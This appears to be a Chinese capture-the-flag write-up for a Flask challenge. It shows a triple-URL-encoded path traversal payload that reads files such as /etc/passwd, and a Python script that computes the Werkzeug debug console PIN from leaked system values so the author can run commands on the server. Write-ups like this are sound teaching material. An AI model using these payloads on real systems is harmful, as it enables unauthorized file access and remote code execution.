首先,分析题目描述,发现是个flask后端,没啥其他信息
进题目,就只有一个输入框,看源码,没啥东西,抓包,发现是个filename参数
怎么改都没啥用,于是删除必要参数看看报错
发现出现了debug页面,有关键代码被泄露:
@app.route("/home", methods=['POST'])
def home():
filename = urllib.parse.unquote(request.form['filename'])
data = "Try Harder....."
naughty = "../"
if naughty not in filename:
filename = urllib.parse.unquote(filename)
if os.path.isfile(current_app.root_path + '/'+ filename):
这个路由有逻辑漏洞,检验和实际文件名不一致,差一次url解码,于是三次url编码加路径穿越完成任意文件读(注意request.form也自动解码一次,建议使用https://gchq.github.io/CyberChef/)
示例payload:(读/app/app.py)
%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252Fapp%25252Fapp.py
app.py里面并没有什么有用的东西,/etc/passwd里面有一个看起来就奇怪的用户名(这个得靠经验)yooboi,尝试在/home/yooboi里面读取flag.txt和flag,没有用
读的文件都没了,那就换条路,flask后端搭载了werkzeug工具包,debug模式开启时,可以通过/console路由访问调试控制台执行命令,但是需要PIN。看这篇文章可以找到在LFI(本地文件读)的情况下如何得到PIN码
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug
我这里只给出正确结果和脚本:
username:yooboi
modname:flask.app
getattr(app, ‘__name__’, getattr (app.__ class__, ‘__name__’)):Flask
getattr(mod, ‘__file__’, None):/usr/local/lib/python3.9/site-packages/flask/app.py
str(uuid.getnode()):2485377892355
get_machine_id():e01d426f-826c-4736-9cd2-a96608b66fd8
求PIN脚本:
import hashlib
from itertools import chain
probably_public_bits = [
'yooboi',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.9/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485377892355',# str(uuid.getnode()), /sys/class/net/ens33/address
'e01d426f-826c-4736-9cd2-a96608b66fd8'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
最终PIN:695-086-043
输入正确PIN后就可以RCE了,最终flag: